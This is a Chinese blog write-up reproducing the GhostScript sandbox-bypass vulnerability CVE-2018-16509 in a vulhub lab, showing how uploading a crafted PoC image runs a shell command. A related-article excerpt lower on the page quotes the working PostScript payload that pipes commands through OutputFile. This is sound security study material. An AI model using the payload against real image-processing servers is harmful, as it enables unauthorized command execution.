GhostScript 沙箱绕过(命令执行)漏洞 CVE-2018-16509 漏洞复现

最新推荐文章于 2024-03-03 20:01:47 发布
最新推荐文章于 2024-03-03 20:01:47 发布
阅读量290 收藏
点赞数 1
分类专栏: vulhub_Writeup 文章标签: 网络安全 安全漏洞 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43416469/article/details/114040693
版权

GhostScript 沙箱绕过(命令执行)漏洞(CVE-2018-16509)

by ADummy

0x00利用路线

​ 构造poc png图片—>上传图片—>有回显命令执行

0x01漏洞介绍

​ 8 月 21 号,Tavis Ormandy 通过公开邮件列表,再次指出 GhostScript 的安全沙箱可以被绕过,通过构造恶意的图片内容,将可以造成命令执行、文件读取、文件删除等漏洞:

  • http://seclists.org/oss-sec/2018/q3/142
  • https://bugs.chromium.org/p/project-zero/issues/detail?id=1640

GhostScript 被许多图片处理库所使用,如 ImageMagick、Python PIL 等,默认情况下这些库会根据图片的内容将其分发给不同的处理方法,其中就包括 GhostScript。

0x02漏洞复现

上传poc.png,将执行命令id > /tmp/success && cat /tmp/success。此时进入容器docker-compose exec web bash,将可以看到/tmp/success已被创建:

在这里插入图片描述

你也可以使用命令行测试该漏洞:

docker run -it --rm --name im -v `pwd`/poc.png:/poc.png vulhub/imagemagick:7.0.8 convert /poc.png /poc.gif

nvert /poc.png /poc.gif
ADummy_
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ghostscript-9.26-bin
10-12
ghostscript 9.26版本 armhf<gcc6.3> 和 armel架构 可执行文件.so文件等 凑字数凑字数
vulhub中ghostscriptcve-2018-16509漏洞复现记录
xeeyuuuu的博客
04-08 546
漏洞在kali环境中复现,首先进入CVE-2018-16509目录,开启docker-compose环境 开启漏洞环境命令: ​ docker-compose build ​ docker-compose up -d 参考:https://blog.csdn.net/qq_41901122/article/details/107978142 访问该地址,可以看到有文件上传的途径 端口8080 poc:poc.png poc地址:https://github.com/vulhub/vulhub/blob
[春秋云镜]CVE-2018-16509
niubi707的博客
12-02 5262
春秋云镜CVE-2018-16509GhostScript 的安全沙箱可以被绕过,通过构造恶意的图片内容,将可以造成命令执行、文件读取、文件删除等漏洞。 Python 中处理图片的模块 PILPillow),因为其内部调用了 GhostScript 而受到 CVE-2018-16509的影响
复现vulhub中ghostscriptCVE-2018-16509漏洞
最新发布
YX_zjp的博客
03-03 330
使用腾讯云轻量服务器安装vulhub。系统:ubuntu20.04。可以看到相关端口是8080。done表示环境已开启。
vulhub漏洞复现十七_GhostScript
weixin_44193247的博客
01-28 909
vulhub漏洞复现练习篇
GhostScript 沙箱绕过命令执行漏洞CVE-2018-16509
Redredredfish的博客
09-16 1237
Day04 GhostScript 沙箱绕过命令执行漏洞CVE-2018-16509漏洞概述 ①漏洞简介 ​ 8 月 21 号,Tavis Ormandy 通过公开邮件列表,再次指出 GhostScript 的安全沙箱可以被绕过,通过构造恶意的图片内容,将可以造成命令执行、文件读取、文件删除等漏洞。 ②GhostScript GhostScript 是一套建基于Adobe、PostScript及可移植文档格式(PDF)的页面描述语言等而编译成的免费软件。Ghostscript 可以查看及打印
漏洞靶场】--GhostScript 沙箱绕过命令执行漏洞CVE-2018-16509
hello word的博客
01-06 2181
环境 exp 把如下代码保存为一个png文件。 %!PS userdict /setpagedevice undef save legal { null restore } stopped { pop } if { legal } stopped { pop } if restore mark /OutputFile (%pipe%ls / > /tmp/success && cat /tmp/success) currentdevice putdeviceprops 上传,执行l
ghostscript-9.02.tar.gz
09-03
ghostscript-9.02,用于linux中pdf转图片工具
Node.js-使用Ghostscript命令优化PDF文件大小
08-10
使用Ghostscript命令优化PDF文件大小
使用Ghostscript命令优化PDF-Node.js开发
05-27
gsx-pdf-optimize使用Ghostscript gsx命令优化PDF,例如test / raw_pdf.pdf(由Figma生成)从3.7 MB扩展到642 KB。 安装首先,请确保已在命令中安装了Ghostscript。 在gsx-pdf-optimize使用Ghostscript gsx命令优化...
exportfig-ghostscript-xpdftools.rar
06-05
export_fig可以使matlab更方便的输出图像,如去除白边,保真等,此包提供配置export_fig所需的软件。我写的配套的教程如下:https://blog.csdn.net/Liangontheway/article/details/90903348
CVE-2018-11759:显示如何利用CVE-2018-11759的概念证明
03-19
概念验证 描述 特定于Apache Web服务器(httpd)的代码在将请求的路径与Apache Tomcat JK(mod_jk)连接器1.2.0至1.2.44中的URI-worker映射进行匹配之前对其进行了规范化,无法正确处理某些边缘情况。如果仅通过httpd公开了Tomcat支持的URL的子集,则特殊构造的请求可能会通过反向代理公开应用程序功能,而该功能不适用于客户端通过反向代理访问应用程序。在某些配置中,特殊构造的请求也有可能绕过httpd中配置的访问控制。尽管此问题与CVE-2018-1323之间存在某些重叠之处,但它们并不完全相同。 POC 以下概念验证显示了如何利用CVE-2018-11759及其对目标信息系统的影响。 环境设定 docker-compose up -d 请耐心等待,第一次的过程可能会很长。 运行后,可通过以下地址访问易受攻击的代理 开发 可以将使用mod
GhostScript沙箱绕过(命令执行漏洞)CVE-2018-16509
她叫常玉莹
07-27 981
2018年8 月 21 号,Tavis Ormandy 通过公开邮件列表,再次指出 GhostScript 的安全沙箱可以被绕过,通过构造恶意的图片内容,将可以造成命令执行、文件读取、文件删除等漏洞GhostScript 被许多图片处理库所使用,如 ImageMagick、Python PIL 等,默认情况下这些库会根据图片的内容将其分发给不同的处理方法,其中就包括 GhostScript。 访问http://192.168.0.104:8080上传poc.png 执行id > /tmp/succ
vulhub漏洞复现55_python
weixin_44193247的博客
02-11 690
vulhub漏洞复现练习篇
利用Vulnhub复现漏洞 - GhostScript 沙箱绕过命令执行漏洞CVE-2018-16509
JiangBuLiu的博客
07-08 1998
GhostScript 沙箱绕过命令执行漏洞CVE-2018-16509)Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现POC上传POC Vulnhub官方复现教程 https://vulhub.org/#/environments/ghostscript/CVE-2018-16509/ 漏洞原理 GhostScript 被许多图片处理库所使用,如 ImageMagick、Pyt...
vylhub学习文档-GhostScript 沙箱绕过命令执行漏洞
ploto_cs的博客
09-11 415
GhostScript 沙箱绕过命令执行漏洞 一.漏洞介绍 (一)编号 CVE-2018-16509 (二)概述 Ghostscript 是一套基于 Adobe、PostScript 及可移植文档格式(PDF)的页面描述语言等而编译成的免费软件。 Ghostscript 可以查看及打印 PS、EPS、PDF 文件,支持 PS 的绘图程序一般都很大 以Postscript和PDF阅览器使用的栅格化影像处理器RIP引擎,GhostScript 被许多图片处理库所使用。 (三)适用条件 在文件上传过程中,有可
CVE-2018-11759】Apache mod_jk访问控制的绕过漏洞复现
Blog of Jaoing
04-24 4165
Apache Tomcat JK(mod_jk)Connector是美国阿帕奇(Apache)软件基金会的一款为Apache或IIS提供连接后台Tomcat的模块,用以为Apache或IIS服务器提供处理JSP/Servlet的能力。 由于httpd和Tomcat在路径处理规范上存在差异,因此可以绕过Apache mod_jk Connector 1.2.0版本到1.2.44版......

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值